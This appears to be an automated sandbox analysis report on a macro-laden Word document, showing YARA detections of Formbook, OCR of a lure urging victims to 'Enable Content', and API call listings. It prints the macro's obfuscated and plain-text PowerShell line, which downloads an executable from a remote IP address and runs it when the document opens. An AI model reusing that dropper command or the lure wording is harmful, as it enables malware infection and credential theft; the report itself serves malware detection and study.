Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Screenshot number: 4	Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital Page1 of 1 Owords It? O
Source: Document image extraction number: 0	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Document image extraction number: 0	Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital
Source: Document image extraction number: 1	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Document image extraction number: 1	Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital
Source: Screenshot number: 8	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Screenshot number: 8	Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital k L Owords It? O Type h

Document contains an embedded VBA macro which may execute processes

Show sources

Source: RFL_PO 69002.doc	OLE, VBA macro line: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, API IWshShell3.Run("powershell -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/RFL_0769002.exe" -Destination "C:\Users\Public\Documents\nothinglittle.exe";C:\Users\Public\Documents\nothinglittle.exe")			Name: Document_Open

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: RFL_PO 69002.doc	OLE, VBA macro line: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))			Name: Document_Open

Source: C:\Users\Public\Documents\nothinglittle.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419D60 NtCreateFile,	28_2_00419D60
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419E10 NtReadFile,	28_2_00419E10
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419E90 NtClose,	28_2_00419E90
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419F40 NtAllocateVirtualMemory,	28_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419D5A NtCreateFile,	28_2_00419D5A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419E8B NtClose,	28_2_00419E8B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419F3A NtAllocateVirtualMemory,	28_2_00419F3A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C95D0 NtClose,LdrInitializeThunk,	28_2_012C95D0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9710 NtQueryInformationToken,LdrInitializeThunk,	28_2_012C9710
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9780 NtMapViewOfSection,LdrInitializeThunk,	28_2_012C9780
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9660 NtAllocateVirtualMemory,LdrInitializeThunk,	28_2_012C9660
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C96E0 NtFreeVirtualMemory,LdrInitializeThunk,	28_2_012C96E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	28_2_012C9910
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C99A0 NtCreateSection,LdrInitializeThunk,	28_2_012C99A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9860 NtQuerySystemInformation,LdrInitializeThunk,	28_2_012C9860
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A00 NtProtectVirtualMemory,LdrInitializeThunk,	28_2_012C9A00
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A50 NtCreateFile,LdrInitializeThunk,	28_2_012C9A50
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CB040 NtSuspendThread,	28_2_012CB040
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CA3B0 NtGetContextThread,	28_2_012CA3B0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9520 NtWaitForSingleObject,	28_2_012C9520
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9560 NtWriteFile,	28_2_012C9560
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9540 NtReadFile,	28_2_012C9540
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C95F0 NtQueryInformationFile,	28_2_012C95F0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9730 NtQueryVirtualMemory,	28_2_012C9730
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CA710 NtOpenProcessToken,	28_2_012CA710
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9760 NtOpenProcess,	28_2_012C9760
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9770 NtSetInformationFile,	28_2_012C9770
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CA770 NtOpenThread,	28_2_012CA770
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C97A0 NtUnmapViewOfSection,	28_2_012C97A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9610 NtEnumerateValueKey,	28_2_012C9610
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9670 NtQueryInformationProcess,	28_2_012C9670
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9650 NtQueryValueKey,	28_2_012C9650
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C96D0 NtCreateKey,	28_2_012C96D0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9950 NtQueueApcThread,	28_2_012C9950
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C99D0 NtCreateProcessEx,	28_2_012C99D0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9820 NtEnumerateKey,	28_2_012C9820
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9840 NtDelayExecution,	28_2_012C9840
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C98A0 NtWriteVirtualMemory,	28_2_012C98A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C98F0 NtReadVirtualMemory,	28_2_012C98F0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9B00 NtSetValueKey,	28_2_012C9B00
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A20 NtResumeThread,	28_2_012C9A20
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A10 NtQuerySection,	28_2_012C9A10
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A80 NtOpenDirectoryObject,	28_2_012C9A80
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CAD30 NtSetContextThread,	28_2_012CAD30
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9FE0 NtCreateMutant,	28_2_012C9FE0

Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_030217B0	9_2_030217B0
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03021785	9_2_03021785
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03021C18	9_2_03021C18
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03021C28	9_2_03021C28
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059DF528	9_2_059DF528
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059DA4A8	9_2_059DA4A8
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059D0006	9_2_059D0006
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059D0040	9_2_059D0040
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059DEEA0	9_2_059DEEA0
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059D6B28	9_2_059D6B28
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00401030	28_2_00401030
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041D8BA	28_2_0041D8BA
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041D988	28_2_0041D988
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041E2F2	28_2_0041E2F2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_004012FB	28_2_004012FB
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041DA9E	28_2_0041DA9E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00402D88	28_2_00402D88
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00402D90	28_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00409E40	28_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041DE31	28_2_0041DE31
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00409E3B	28_2_00409E3B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041D719	28_2_0041D719
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CFA3	28_2_0041CFA3
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CFA6	28_2_0041CFA6
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00402FB0	28_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041DFB0	28_2_0041DFB0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120	28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129C1C0	28_2_0129C1C0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01341002	28_2_01341002
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D	28_2_012B701D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0	28_2_012B20A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013520A8	28_2_013520A8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B090	28_2_0129B090
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013460F5	28_2_013460F5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134231B	28_2_0134231B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A3360	28_2_012A3360
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126337D	28_2_0126337D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B138B	28_2_012B138B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01263382	28_2_01263382
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013323E3	28_2_013323E3
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013403DA	28_2_013403DA
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236	28_2_012AB236
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126225E	28_2_0126225E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013522AE	28_2_013522AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013532A9	28_2_013532A9
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134E2C5	28_2_0134E2C5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B65A0	28_2_012B65A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2581	28_2_012B2581
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129D5E0	28_2_0129D5E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013525DD	28_2_013525DD
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A2430	28_2_012A2430
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129841F	28_2_0129841F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134D466	28_2_0134D466
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477	28_2_012AB477
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012694B8	28_2_012694B8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496	28_2_01344496
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013467E2	28_2_013467E2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134D616	28_2_0134D616
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600	28_2_012A5600
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289660	28_2_01289660
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0	28_2_012B06C0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128F900	28_2_0128F900
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A2990	28_2_012A2990
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135E824	28_2_0135E824
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA830	28_2_012AA830
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01286800	28_2_01286800
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012888E0	28_2_012888E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013528EC	28_2_013528EC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01352B28	28_2_01352B28
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AAB40	28_2_012AAB40
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0132CB4F	28_2_0132CB4F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BEBB0	28_2_012BEBB0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AEB9A	28_2_012AEB9A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0132EB8A	28_2_0132EB8A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012D8BE8	28_2_012D8BE8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134DBD2	28_2_0134DBD2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BABD8	28_2_012BABD8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0133FA2B	28_2_0133FA2B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01345A4F	28_2_01345A4F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344AEF	28_2_01344AEF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01280D20	28_2_01280D20
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01352D07	28_2_01352D07
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01351D55	28_2_01351D55
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A2D50	28_2_012A2D50
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01342D82	28_2_01342D82
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134CC77	28_2_0134CC77
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B4CD4	28_2_012B4CD4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01351FF1	28_2_01351FF1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135DFCE	28_2_0135DFCE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A6E30	28_2_012A6E30
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0130AE60	28_2_0130AE60
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01331EB6	28_2_01331EB6
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01352EF7	28_2_01352EF7

Source: RFL_PO 69002.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open			Name: Document_Open

Source: RFL_PO 69002.doc

OLE indicator, VBA macros: true

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: String function: 0128B150 appears 177 times
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: String function: 012DD08C appears 51 times
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: String function: 01315720 appears 85 times

Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
